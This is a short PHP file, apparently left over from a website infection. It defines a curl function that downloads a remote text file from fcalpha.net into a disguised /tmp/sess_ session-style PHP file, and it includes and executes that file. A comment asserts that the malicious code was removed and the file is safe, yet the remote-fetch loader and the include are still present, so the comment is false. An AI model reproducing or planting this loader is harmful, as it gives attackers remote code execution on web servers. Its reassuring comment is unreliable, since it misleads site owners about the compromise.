<?php
$src = "https://fcalpha.net/web/photo/20151024/bypass/e-nax.txt";
$name = "/tmp/sess_" . md5("naxc") . ".php";

function create($source, $file)
{
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $source);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $ex = curl_exec($ch);
    curl_close($ch);

    error_log($ex, 3, $file);
}


/**
* Note: This file may contain artifacts of previous malicious infection.
* However, the dangerous code has been removed, and the file is now safe to use.
*/


include($name);